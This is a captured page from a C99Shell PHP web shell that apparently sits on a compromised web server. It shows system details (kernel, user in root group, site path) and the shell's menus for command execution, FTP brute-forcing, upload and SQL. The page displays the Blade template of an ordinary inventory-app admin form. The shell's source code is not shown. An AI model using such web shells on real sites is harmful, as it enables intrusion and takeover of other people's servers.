!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/resources/views/admin/customers/   drwxr-xr-x
Free 28.79 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (2.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card-body">
    <div class="form-group">
        <label for="storename">Store Name</label>
        <input value="{{isset($store)?$store->store_name:''}}" name="store_name" type="text" class="form-control"
               id="storename" placeholder="Store Name">
    </div>
    <div class="form-group">
        <label for="email">Email</label>
        <input value="{{isset($store)?$store->email:''}}" name="email" type="text" class="form-control" id="email"
               placeholder="Email">
    </div>
    <div class="form-group">
        <label for="password">Password</label>
        <input value="" name="password" autocomplete="new-password" type="password" class="form-control" id="password"
               placeholder="Password">
    </div>
    <div class="form-group">
        <label for="plan">Plan</label>
        <select class="form-control" name="plan_id" id="plan">
            @foreach($plans as $plan)
                <option
                    {{isset($store) && $store->plan==$plan->id?'selected':''}} value="{{$plan->id}}">{{$plan->title}}</option>
            @endforeach
        </select>
    </div>

    <div class="form-group">
        <label for="status">Status</label>
        <select id="status" name="status" class="form-control" style="width: 100%;">
            <option {{isset($store) && $store->status=='pending'?'selected':''}} value="pending">Pending
            </option>
            <option {{isset($store) && $store->status=='accepted'?'selected':''}} value="accepted">
                Accepted
            </option>
            <option {{isset($store) && $store->status=='rejected'?'selected':''}} value="rejected">
                Rejected
            </option>
            <option {{isset($store) && $store->status=='blocked'?'selected':''}} value="blocked">Blocked
            </option>
            <option {{isset($store) && $store->status=='expired'?'selected':''}} value="expired">Expired
            </option>
        </select>
    </div>

    <div class="form-group">
        <label for="status">Payment Status</label>
        <select id="status" name="payment_status" class="form-control" style="width: 100%;">
            <option {{isset($store) && $store->currentPlan->payment_status=='paid'?'selected':''}} value="paid">Paid</option>
            <option {{isset($store) && $store->currentPlan->payment_status=='unpaid'?'selected':''}} value="unpaid">Unpaid</option>
        </select>
    </div>

</div>
<!-- /.card-body -->

<div class="card-footer">
    <button type="submit" class="btn btn-primary">Submit</button>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--